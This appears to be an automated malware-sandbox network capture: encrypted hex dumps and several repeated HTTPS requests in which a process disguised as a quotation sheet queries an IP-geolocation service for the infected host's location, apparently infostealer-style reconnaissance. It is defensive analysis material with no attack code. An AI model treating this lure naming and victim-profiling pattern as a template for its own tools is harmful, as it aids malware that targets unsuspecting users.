2024-07-24 12:45:26 UTC | 4863 | IN | Data Raw: ca 3a 68 51 3a 4b 4a c0 68 06 55 94 b4 84 4d 8d 04 d1 de dc d9 01 f3 09 cb 68 e9 72 b4 e9 c2 4b b5 27 34 56 f9 ef c2 5a 3a de b8 25 7c 4d d4 81 9c 0f d2 eb 1a af 67 b0 57 b0 7c 79 91 b3 4b 7a 89 1c 08 7f b3 0c 82 2a 02 41 b0 24 4f 25 84 ae cc 67 49 5c 4c f5 ea 6d e3 9f bb 9e 22 c6 a1 d2 66 67 44 a2 0d e9 6e d9 96 d7 67 7c 06 82 72 5f 3e 54 21 34 47 a1 23 e0 c0 b3 ee 1c 8b d5 c8 b3 16 9f 9c 5c 83 8e 20 d6 4a 6d 35 bf 93 dc 9b d2 24 c5 99 70 af 07 7a ce 06 ae f6 dd d1 9a 4d 22 62 01 eb c5 3d b3 68 68 a2 2e 64 33 22 0f 44 b0 59 59 85 f5 38 fe 2b 32 0b 61 90 98 08 bc 79 d8 e8 71 9c 3f 85 85 65 57 15 3d 80 3c f3 46 8b e7 ab ca 1c a6 6a d9 14 1c f1 2c 15 64 eb 33 02 15 ac f0 fa ea 32 65 ea 2b a2 d0 fb ac 68 5c e0 93 20 e8 11 13 de 18 eb d6 8e f1 d7 a7 60 71 2d
                                                                              Data Ascii: :hQ:KJhUMhrK'4VZ:%|MgW|yKz*A$O%gI\Lm"fgDng|r_>T!4G#\ Jm5$pzM"b=hh.d3"DYY8+2ayq?eW=<Fj,d32e+h\ `q-
                                                                              2024-07-24 12:45:26 UTC4863INData Raw: 8d 00 80 f3 4a f1 3a 69 01 f4 aa 06 e2 cc c6 a9 cc a8 43 f8 ac b8 86 b9 1c 94 fc de aa b9 7f d3 dd bf cb 9f 4d 2d 82 ed 8d 2d ea 32 a8 23 0c 15 ed 77 ce 90 62 d6 cb 8b c5 91 aa 32 0a c1 92 de fb e6 c3 49 d3 b9 4b 49 42 40 7b 8c f5 15 70 cd 80 74 82 ca aa c8 e8 84 33 fa 9a 18 51 45 37 ed 5c 9b e3 a6 73 12 05 8b 68 d4 e0 59 08 b6 82 68 44 b6 9c 10 f0 bc d6 a5 a4 d8 30 f4 66 bc 04 47 c3 c8 73 78 be f7 3e 41 56 a7 04 95 c0 58 ba 76 f1 79 63 7b 70 24 98 cf 47 f1 ff 92 70 bf 31 2f f5 fb d1 d2 78 73 e6 9a e8 03 20 d0 37 de e6 f0 aa e6 b2 2b e2 50 ef 1c 65 4c f1 85 22 63 bb 8a f4 42 ed 04 0f e8 3d cc ad e1 da 10 87 f7 85 c4 3a f4 3f 67 ca 7f e2 44 8c 8a 84 1e cc ab 5c 41 e5 15 df ed 5c f3 e9 5c 4c 38 c3 27 df f3 31 64 c2 34 0a e6 bc f7 98 6f d5 43 1f c0 3e 8e bf
                                                                              Data Ascii: J:iCM--2#wb2IKIB@{pt3QE7\shYhD0fGsx>AVXvyc{p$Gp1/xs 7+PeL"cB=:?gD\A\\L8'1d4oC>
                                                                              2024-07-24 12:45:26 UTC112INData Raw: e4 45 d2 a4 8a 38 cc 99 df b3 fa b3 9d 27 ac 8c 7e e7 45 72 f7 be c9 6f a2 be ae 5a af 2e 0b bd ec 5f c2 ba 0f c0 6d ba 5d aa 9a 88 12 32 00 0d c3 81 68 a1 4e 28 6d 70 78 03 58 58 c1 48 f8 fe 7e 1c 67 12 05 d0 1a db d5 57 e9 4c 30 52 c9 3a e0 22 85 e3 b4 e0 ce 8b 22 99 d9 09 63 aa 98 ae 1b 49 e1 bc 95 9e c2 1a 57 ad 00 33 a9 a7 88 bd
                                                                              Data Ascii: E8'~EroZ._m]2hN(mpxXXH~gWL0R:""cIW3
                                                                              2024-07-24 12:45:26 UTC1255INData Raw: 50 6e e9 5d 5c d3 6a 40 33 4d 75 7c 31 25 c7 a3 9a be 0e e2 7f 07 fc 2f 57 9f 17 ae a7 65 05 66 69 f1 5d 3e b3 d4 f7 a7 a2 2c f4 df ff a5 12 a1 66 61 1e 0c 34 ec f0 ff ca fd ed 87 bc 26 57 e1 1e 65 55 33 92 72 8b 8c 84 84 3f df a8 fb 71 17 e8 55 5e be bf de 61 83 e3 94 cd 36 e1 28 45 b0 06 a4 bc da 7c 23 2f e7 a9 e6 e3 64 3a 98 43 48 f3 63 ab 6a 51 f0 ce c3 72 48 b6 53 90 8b b8 39 b2 83 93 d9 a0 1e 23 d6 12 13 63 0a ae 65 4f 4a 8f b2 6b 96 37 a6 72 43 9b 88 bb 1c cc d1 8f d4 d8 9c 4a 0d c5 c8 7b 4c 59 c3 09 1a e1 a6 3c ee 68 17 ea f2 3b a1 e1 2a 2b fc cd 6c 9c 84 af e0 15 86 40 fa a7 a9 8b 64 71 a4 51 cb e9 e5 ec 29 8b 2c ad b2 81 6c 07 20 df 28 03 6e 1d f0 f9 6b 5d d2 df fe ba 4d 4b 8e 65 cb 5b d0 9c 24 99 23 8c 7b 46 44 97 fc a6 1c af b3 37 94 a1 00 ba
                                                                              Data Ascii: Pn]\j@3Mu|1%/Wefi]>,fa4&WeU3r?qU^a6(E|#/d:CHcjQrHS9#ceOJk7rCJ{LY<h;*+l@dqQ),l (nk]MKe[$#{FD7
                                                                              2024-07-24 12:45:26 UTC65INData Raw: 9a b0 f4 27 3f ab 36 89 d0 0b e9 4b 06 82 4d 1c ed 67 53 1d 81 3e 1a ed 81 1f e4 49 f0 2f 61 9a 98 08 97 72 d8 a9 3d 8a 50 01 84 66 5d 45 bf 01 53 8d 6c 8b e7 af e2 d5 a6 8a d3 79 d7 fa 2d 4f 64
                                                                              Data Ascii: '?6KMgS>I/ar=Pf]ESly-Od
                                                                              2024-07-24 12:45:26 UTC1255INData Raw: fa ce 7d 33 ac e4 fe 94 15 65 ea 2f 8f 7a f9 ac 62 13 2b 93 20 c2 13 02 d7 09 a3 b9 42 d1 d7 ad 60 62 25 5e 07 84 8d 71 11 ad 63 80 a4 b5 a6 62 1d 2f db 73 ac d2 69 cb 1e 11 9b ff 99 ce 2d e3 e1 b2 fc 09 fe d9 48 d2 2a 7b 99 7b 88 6d ad bb 1f 9e 3b 74 33 d7 d9 07 e3 7f 1a bf 78 64 18 00 35 e7 0b 27 d6 ae 0b 55 3a 7b 92 14 9e 05 21 f5 88 66 28 c8 1e 3b c4 a1 c4 06 ec e6 14 be 1e db 99 1f 8d 07 13 22 2b 76 26 0a 94 ed 96 4a 9d da 89 82 41 1c 80 a8 28 ba 2e c6 cc 25 a2 96 9c bc 0e ca 79 35 29 9d df a9 6b 8a 69 fe 3f ce d8 e6 9f 9c ce 80 a6 a3 25 46 b5 54 ee a0 e3 2c da 8c 82 bf 88 b2 9a 34 9f 50 24 c2 13 de a8 c4 2a 33 dc 80 95 cf b4 71 32 d2 4a ab 32 5a 77 ef c7 c5 dc a2 bc 4d 16 9f fc da 1e 45 e8 75 a5 7b f8 6a af f5 83 5d 67 c7 af dc c0 34 48 c8 a4 0f 94
                                                                              Data Ascii: }3e/zb+ B`b%^qcb/si-H*{{m;t3xd5'U:{!f(;"+v&JA(.%y5)ki?%FT,4P$*3q2J2ZwMEu{j]g4H
                                                                              2024-07-24 12:45:26 UTC1255INData Raw: 3b 2c 93 c2 e9 a4 ea c6 0f d8 09 20 14 a9 1e d6 e4 50 32 6f 49 6b c7 71 82 63 b3 f0 22 3d 56 18 39 54 52 ce 0d 6b e0 1f 17 6d b8 33 e9 be 8f 5d 07 5c 74 2d 08 2e 1c 10 e1 1e ab 23 b1 6a cd d3 f0 37 df 86 df 16 c7 bc ba bf 4d cb 4a 8b a5 1f 21 cd f8 f9 b7 2e e4 7e 1d fa a3 28 75 e7 8c 45 d8 b9 b0 69 a3 9d db 64 bc b7 b9 18 ab 9c 34 7b b1 eb b2 3b a6 b9 27 1b a9 16 29 ba bf 7b 7b a2 7e 8d d0 ca 1c 11 2f a9 40 d6 35 b1 58 10 f1 b7 d0 d0 2b ac 8c 8c a1 05 bb 6f d5 80 35 95 63 2e b0 6e c8 15 8f 57 53 cc 08 7b 06 08 28 34 f6 2e 28 6c f6 5f 41 b7 78 82 4f 14 92 aa d1 e1 74 45 c3 c4 ca d4 3b 5c 3e 88 a7 13 96 eb cf 30 88 2e f4 38 f4 b1 97 ef 5b 58 99 6c be c0 9d 1b 4c 55 b7 b7 d1 0f 33 88 86 26 a9 e9 21 8a 17 cf 5c 92 7f a5 49 8a 3e c8 8b 20 17 a5 a9 9d e6 29 81
                                                                              Data Ascii: ;, P2oIkqc"=V9TRkm3]\t-.#j7MJ!.~(uEid4{;'){{~/@5X+o5c.nWS{(4.(l_AxOtE;\>0.8[XlLU3&!\I> )
                                                                              2024-07-24 12:45:26 UTC1255INData Raw: 00 fd eb 29 9e 95 af e0 66 2f 40 fa 6d 5d 06 b0 ba 84 54 a6 a3 e5 ed 3b 5d 64 ab a4 75 63 5f 33 bb bb 17 31 93 f6 00 2d 5d d2 df f3 98 45 e9 a1 a8 08 6f f7 8b a3 99 0b d4 7a 63 58 fa 67 af 09 81 f7 1f 3e ab 00 9a e9 b3 79 f5 b7 e3 67 43 e1 19 dd 08 13 80 49 a2 04 c9 df 2a 60 ca 59 20 85 84 c4 8f 1e 2e f7 0c d6 7d 41 37 1c 6d 99 23 19 a3 9a 51 50 94 86 4d cf 1e d1 1d 67 37 eb ad 99 b5 01 d7 f8 ed bc 3d 59 15 74 70 b5 3e 9e 42 4b d4 05 3a b5 3c e7 e1 67 9d ba cd 4e d6 7e a0 55 d6 3c 22 76 57 d4 47 cd c8 32 39 42 71 ac 07 02 a5 c5 e2 bf 78 9b a0 7a 6d 7e 72 64 4e b3 77 11 75 34 31 93 c3 03 83 01 cc e1 ca 76 01 d8 02 75 89 60 4f 8b f2 53 d0 d6 9f 85 d5 e2 84 9b ad 76 07 ba 54 19 3b 49 66 40 57 91 bf 77 6e 87 27 ad c8 21 b7 3d 30 85 f1 e5 93 e2 63 5c 90 9d ec
                                                                              Data Ascii: )f/@m]T;]duc_31-]EozcXg>ygCI*`Y .}A7m#QPMg7=Ytp>BK:<gN~U<"vWG29Bqxzm~rdNwu41vu`OSvT;If@Wwn'!=0c\
                                                                              2024-07-24 12:45:26 UTC1255INData Raw: 87 b4 86 e4 95 d5 ba c0 c1 d3 f5 b9 07 19 28 29 69 49 e1 c7 ed 9c 3e 6a da 89 86 2e d8 80 d6 3b ba 3f cf cc 6f b5 96 9c 82 97 9c 79 3f 51 10 36 a8 08 b1 1d ed 06 97 b6 23 9f 81 49 c0 b7 ae 3f ee e3 26 4b bb c6 4a 0a 8a 83 97 49 10 bf 29 15 c4 3c b0 24 6a 8d ac fa 2b d3 fe c0 6d 91 6c ee d2 50 d9 65 ee 52 85 17 0d d0 dc ec ef 3e e0 93 3c 14 2a 24 d7 80 6d 8a af e5 f5 f3 f9 5c b2 be d2 b9 e9 5c c8 b3 91 db 9a cd 6a 7e 8e ae 97 c5 99 c6 55 aa 1f 15 b4 04 6a 38 48 56 52 0e 89 a3 d7 f0 ad 1e a5 d7 79 f4 b1 5b 40 d5 5b 96 93 9c e3 96 b9 b9 1e c4 86 61 90 af 39 69 1b 59 33 24 da 9d db ad b6 a8 40 82 a6 9f cb f4 de 71 39 c1 17 04 ba da cc 09 f9 e8 fa d0 26 e3 7c 9f 7a f8 dc eb 15 67 29 13 da 44 43 df 14 50 24 7b 51 2a ff d1 d1 81 3b 31 58 36 dc a6 e6 3c e3 3e d0
                                                                              Data Ascii: ()iI>j.;?oy?Q6#I?&KJI)<$j+mlPeR><*$m\\j~Uj8HVRy[@[a9iY3$@q9&|zg)DCP${Q*;1X6<>
                                                                              2024-07-24 12:45:26 UTC1255INData Raw: 43 af 79 57 ba bf af 67 80 5e 37 b9 a0 79 b9 24 a9 62 85 35 b6 3d 72 f1 b7 f0 dd 22 e5 86 84 2f 6c d4 d2 d5 ac 3f 95 6a d5 d1 6e c8 df 8e 89 5f dc 01 57 01 44 47 35 f7 35 12 65 2a c0 51 92 50 92 4f 14 89 b9 ab f8 5c 16 c7 b6 33 1f bb 28 28 a0 f1 13 96 9f c0 ce 89 20 80 4a 3b b1 e7 f9 67 de f0 6c b4 d7 4b 37 5f 50 ac c0 eb fe 31 f8 91 d5 b6 e9 21 8f 40 86 35 bf 0f b3 65 f4 3a c8 81 30 86 12 ba 9b fd 5d f7 31 15 5d b6 2e 67 3f a5 80 3c f3 da 5f b1 3d 31 fd 8c 8f e1 ed 1e d1 3c ed ad ca 67 5e 38 93 8e 88 ed e9 56 23 9a 38 34 d2 df 08 5d 0e 12 4f 7c a8 d7 a1 e0 72 32 19 42 94 37 01 65 70 de 9c cc 16 53 f2 cd 23 85 a9 cd a7 da d2 b4 88 a6 cf bb 19 c4 94 99 6e f9 38 16 94 95 71 57 41 7c e0 c6 9d 2b 80 53 3e e9 19 13 fb af f3 1b a4 25 bd 21 6a f7 39 e4 40 68 1c
                                                                              Data Ascii: CyWg^7y$b5=r"/l?jn_WDG55e*QPO\3(( J;glK7_P1!@5e:0]1].g?<_=1<g^8V#84]O|r2B7epS#n8qWA|+S>%!j9@h


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              2 | 192.168.11.20 | 49782 | 172.67.177.134 | 443 | 5668 | C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-07-24 12:45:28 UTC | 86 | OUT | GET /xml/149.18.24.104 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2024-07-24 12:45:29 UTC | 695 | IN | HTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:29 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: MISS
                                                                              Last-Modified: Wed, 24 Jul 2024 12:45:29 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lvTb9S2nHA520lryzIGtV8v0n4SeLWBq55bpuIkaJfACwcAz2pyy%2FYj4cZ0dnplAG8eqKWR5NeYA8l31Qwn5j5cDrkg8%2BNmVPgEWLlXsyF85nZ3b3sXRPuj%2BTIIZMAOFiTF9Qpuj"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8a8401f00b6f0832-IAD
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-07-24 12:45:29 UTC342INData Raw: 31 34 66 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e
                                                                              Data Ascii: 14f<Response><IP>149.18.24.104</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.
                                                                              2024-07-24 12:45:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              3 | 192.168.11.20 | 49783 | 172.67.177.134 | 443 | 5668 | C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-07-24 12:45:29 UTC | 62 | OUT | GET /xml/149.18.24.104 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-07-24 12:45:30 UTC | 709 | IN | HTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:30 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: MISS
                                                                              Last-Modified: Wed, 24 Jul 2024 12:45:30 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F%2FBPI3z2c%2BiBZD7jNGdLayPmetjaI9rp%2Fn6z9c1mOg56LRW2KlLNOIYJ4SX7gUWlhk%2FU3iF8r6x5%2Fi57aoDjOI1MdWJlu%2BGke%2FFMNn8VIxYB4sA8X6Rx4LjBTUbR%2BUsB%2FwPewugx"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8a8401f66c47c999-IAD
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-07-24 12:45:30 UTC342INData Raw: 31 34 66 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e
                                                                              Data Ascii: 14f<Response><IP>149.18.24.104</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.
                                                                              2024-07-24 12:45:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              4 | 192.168.11.20 | 49784 | 172.67.177.134 | 443 | 5668 | C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-07-24 12:45:30 UTC | 62 | OUT | GET /xml/149.18.24.104 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-07-24 12:45:31 UTC | 710 | IN | HTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:30 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 1
                                                                              Last-Modified: Wed, 24 Jul 2024 12:45:29 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BCBLywrrwNOC%2FyLmQ%2FiY6iP%2BWE7ScuY3kXamN3%2B8oPKco6kFMkB8dZz0swYDDehmA7kQ1E%2FVTZm4YX0YGWUivEv3Zfg4NV6QSYimeYfqysVyVsaWSei%2Fht%2B26LNZpSnzqcksFhY4"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8a8401fc9f85241c-IAD
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-07-24 12:45:31 UTC342INData Raw: 31 34 66 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e
                                                                              Data Ascii: 14f<Response><IP>149.18.24.104</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.
                                                                              2024-07-24 12:45:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              5 | 192.168.11.20 | 49785 | 172.67.177.134 | 443 | 5668 | C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-07-24 12:45:31 UTC | 62 | OUT | GET /xml/149.18.24.104 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-07-24 12:45:31 UTC | 700 | IN | HTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:31 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 2
                                                                              Last-Modified: Wed, 24 Jul 2024 12:45:29 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L94OMgD8DxOQ4xzdTQeQw%2FqKkfcrDMHkaPjrH%2BM4XnPtnvan2dATAYc2UZ4B92m6bwbYBsBYc6EjpAex2gS9iomVrCG5GGdXAZ21ghiu5FmSBCoaI9XLBcgaKSFRoNMc8q1Z2d05"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8a840200dca33913-IAD
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-07-24 12:45:31 UTC342INData Raw: 31 34 66 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e
                                                                              Data Ascii: 14f<Response><IP>149.18.24.104</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.
                                                                              2024-07-24 12:45:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              6 | 192.168.11.20 | 49786 | 172.67.177.134 | 443 | 5668 | C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-07-24 12:45:32 UTC | 62 | OUT | GET /xml/149.18.24.104 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-07-24 12:45:32 UTC | 702 | IN | HTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:32 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 3
                                                                              Last-Modified: Wed, 24 Jul 2024 12:45:29 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i1wmbzGDTaq2qIJeELhv2t7tdOV609RlU3%2Fg3kX5npGlnUd4sd8LhchD7HrakhLyhpSGSWNXngGE1Tw04rlDwGq5QsdQAjD9zU7TM%2Fcx9gz8I0lIFFcoWf1dun7cGO21%2BGv8Xed0"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8a84020559915716-IAD
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-07-24 12:45:32 UTC342INData Raw: 31 34 66 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e
                                                                              Data Ascii: 14f<Response><IP>149.18.24.104</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.
                                                                              2024-07-24 12:45:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              7 | 192.168.11.20 | 49787 | 172.67.177.134 | 443 | 5668 | C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-07-24 12:45:32 UTC | 62 | OUT | GET /xml/149.18.24.104 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-07-24 12:45:33 UTC | 706 | IN | HTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:33 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
  Cache-Control: max-age=86400
  CF-Cache-Status: HIT
